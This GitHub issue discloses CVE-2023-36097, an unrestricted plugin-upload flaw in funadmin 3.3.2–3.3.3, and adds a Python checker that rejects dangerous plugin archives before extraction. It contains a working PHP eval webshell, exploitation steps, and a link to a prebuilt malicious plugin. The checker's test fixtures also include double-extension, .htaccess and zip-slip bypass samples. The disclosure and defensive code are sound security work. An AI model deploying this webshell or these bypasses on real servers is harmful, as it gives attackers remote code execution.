CVE-2023-36097: Insecure file upload via plugins install in funadmin v3.3.2 - v3.3.3 · Issue #17 · funadmin/funadmin
funadmin v3.3.2 and v3.3.3 are vulnerable to Insecure file upload via the plugins install.
Vulnerability Product: funadmin
Vulnerability version: 3.3.2 - 3.3.3
Vulnerability type: Insecure file upload
Vulnerability Details:
Vulnerability location: app\backend\controller\Addon.php, localinstall method
The localinstall method does not inspect the files inside an uploaded plugin archive for webshells or for calls to sensitive functions, so a PHP file bundled into the archive is installed as-is and, as the steps below show, ends up reachable under the web root. The result is an insecure (unrestricted) file upload that gives an authenticated backend user remote code execution.
First, download a free plugin and unzip it. The plugin's root directory layout is as follows (directory listing not reproduced here):
Then add a webshell under the plugin's public/js directory.
Content of the shell: <?php @eval($_REQUEST['shell']); ?>
After that, zip the entire plugin directory again.
example plugin(already placed webshell): https://github.com/Leeyangee/leeya_bug/raw/main/demo.zip
Finally, on a site running funadmin v3.3.2, visit http://localhost/backend/index/index.html and click "install offline" (离线安装).
Select the plugin archive just created. After installation, visit http://localhost/static/demo/js/shell.php?shell=phpinfo(); (the plugin's public/ directory is served under /static/demo/, so the bundled file is now reachable and executed by PHP).
Proof that the webshell was uploaded via the plugin install:
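The report describes the missing check but carries no validation code. The following Python script is an added example, not funadmin's code, of what a pre-extraction inspection of a plugin archive would look like. It walks the zip's entry list without extracting anything, rejects zip-slip paths and symlink entries everywhere, and for files under a directory named public/ (assumed here, from the steps above, to be the part that gets published under /static/<plugin>/) enforces a static-asset extension allowlist, rejects any PHP-executable extension in any dotted segment of the name (so shell.php.jpg is caught too), and rejects .htaccess/.user.ini/web.config. The plugin layout, file names, allowlist and the check itself are constructed for this example; only the webshell body is the one from the report. Grepping file contents for functions like eval, which is what the report's wording suggests, is easy to bypass (variable functions, string obfuscation, a .php file that includes a non-.php file), which is why the example restricts what the served directory may contain instead.

```python
from __future__ import annotations

import io
import posixpath
import zipfile

# Extensions that common PHP deployments (mod_php, php-fpm behind a loose
# location regex) may hand to the interpreter. Any one of these in ANY dotted
# segment of a served file's name is rejected, so "shell.php.jpg" fails too.
PHP_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar", "pht", "phps"}

# Static asset types a plugin's public/ directory legitimately needs (assumed allowlist).
STATIC_ALLOWLIST = {"js", "css", "map", "png", "jpg", "jpeg", "gif", "svg", "ico",
                    "woff", "woff2", "ttf", "eot", "json"}

# Per-directory server config files that can make other extensions execute as PHP.
SERVER_CONFIG_FILES = {".htaccess", ".user.ini", "web.config"}

# Directory that is copied under the web root. Assumption taken from the report:
# public/js inside the archive became /static/demo/js/ on the installed site.
SERVED_DIR = "public"


def _escapes_install_dir(name: str) -> bool:
    """True for absolute paths, Windows drive paths and '..' traversal (zip-slip)."""
    n = name.replace("\\", "/")
    if n.startswith("/") or (len(n) > 1 and n[1] == ":"):
        return True
    norm = posixpath.normpath(n)
    return norm == ".." or norm.startswith("../")


def check_plugin_archive(data: bytes) -> list[str]:
    """Inspect a plugin zip BEFORE extraction and return the reasons to reject it.

    An empty list means the archive passed. Nothing is written to disk.
    """
    findings: list[str] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if _escapes_install_dir(name):
                findings.append(f"{name}: path escapes the install directory")
                continue
            if info.is_dir():
                continue
            # Unix file-type bits live in the top 16 bits of external_attr; 0o120000 = symlink.
            if (info.external_attr >> 16) & 0o170000 == 0o120000:
                findings.append(f"{name}: symlink entry")
                continue
            parts = posixpath.normpath(name.replace("\\", "/")).split("/")
            if SERVED_DIR not in parts[:-1]:
                continue  # not web-served: a plugin's controller/model PHP files belong here
            base = parts[-1].lower()
            if base in SERVER_CONFIG_FILES:
                findings.append(f"{name}: server config file in a served directory")
                continue
            segments = base.split(".")[1:]  # every extension-like segment after the first dot
            if not segments or segments[-1] not in STATIC_ALLOWLIST:
                findings.append(f"{name}: extension not on the static-asset allowlist")
            elif any(s in PHP_EXTENSIONS for s in segments):
                findings.append(f"{name}: PHP extension hidden inside the file name")
    return findings


def build_archive(entries: dict[str, bytes]) -> bytes:
    """Build an in-memory zip from {path: content} (fixture helper for the demo below)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, content in entries.items():
            zf.writestr(path, content)
    return buf.getvalue()


# Constructed fixtures: the layout is illustrative, not funadmin's real plugin format.
WEBSHELL = b"<?php @eval($_REQUEST['shell']); ?>"  # the shell body from the report

CLEAN_PLUGIN = {
    "demo/controller/Index.php": b"<?php class Index {}",  # PHP outside public/ is fine
    "demo/public/js/app.js": b"console.log('demo');",
    "demo/public/css/app.css": b"body{}",
}

WEBSHELL_PLUGIN = {
    **CLEAN_PLUGIN,
    "demo/public/js/shell.php": WEBSHELL,       # the report's exact placement
    "demo/public/js/shell.php.jpg": WEBSHELL,   # double-extension variant
    "demo/public/.htaccess": b"AddType application/x-httpd-php .jpg\n",
}

ZIP_SLIP_PLUGIN = {
    **CLEAN_PLUGIN,
    "../../public/evil.php": WEBSHELL,          # would land outside the plugin directory
}

if __name__ == "__main__":
    for label, plugin in (("clean", CLEAN_PLUGIN), ("webshell", WEBSHELL_PLUGIN), ("zip-slip", ZIP_SLIP_PLUGIN)):
        result = check_plugin_archive(build_archive(plugin))
        print(f"{label}: {'OK' if not result else 'REJECT'}")
        for line in result:
            print("  -", line)
```

Run stand-alone, the script accepts the clean fixture and rejects the other two, listing every offending entry. The check is deliberately run on the archive listing rather than on extracted files: by the time the files are on disk under the web root, as in the report, the attacker's request to shell.php already succeeds.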
Discoverer:leeya_bug